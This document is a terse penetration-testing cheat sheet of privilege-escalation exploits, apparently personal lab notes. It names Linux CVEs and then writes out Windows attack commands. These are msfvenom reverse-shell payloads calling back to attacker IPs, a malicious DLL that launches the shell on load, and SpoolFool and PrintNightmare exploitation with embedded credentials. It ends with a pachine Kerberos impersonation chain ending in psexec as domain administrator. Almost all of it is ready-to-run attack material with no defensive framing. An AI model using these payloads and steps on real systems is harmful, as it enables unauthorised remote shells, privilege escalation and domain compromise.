Exploits
Exploits 
Linux
CVE-2021-4034 - Polkit (pkexec)
CVE-2009-2698 - CentOS kernel before 2.6.19
CVE-2012-0056 - Mempodipper
Windows
msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=192.168.119.220 LPORT=4444 -f exe -o rev.exe
msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=192.168.49.164 LPORT=3333 -f dll -o evil.dll
#include <windows.h>
BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved) {
if (dwReason == DLL_PROCESS_ATTACH) {
system("cmd.exe /k c:\\Users\\alice\\Music\\rev.exe");
ExitProcess(0);
}
return TRUE;
}
x86_64-w64-mingw32-gcc evildll.c -shared -o reverse.dll
1. Upload to target : rev.exe, reverse.dll and SpoolFool.ps1
2. listen with netcat 4444
3. Exploit
. .\SpoolFool.ps1
Invoke-SpoolFool -dll reverse.dll
Check
python3 printnightmare.py -check 'alice:ThisIsTheUsersPassword01@10.11.1.22'
Exploit
python3 printnightmare.py -dll 'c:\Users\alice\Music\reverse.dll' 'alice:ThisIsTheUsersPassword01@10.11.1.22'
python3 pachine.py -dc-host xor-dc01.xor.com -scan 'xor.com/daisy:XorPasswordIsDead17'
python3 pachine.py -dc-host xor-dc01.xor.com -spn krbtgt/xor-dc01.xor.com -impersonate administrator 'xor.com/daisy:XorPasswordIsDead17'
export KRB5CCNAME=$PWD/administrator@xor.com.ccache
klist
impacket-psexec -k -no-pass 'xor.com/administrator@xor-dc01.xor.com'
JuicyPotato - Impersonate Privilege
PrintSpoofer - Impersonate Windows2019
TaskSchedPE - Vista/Win7/2008 x86/x64 - cscript 15589.wsf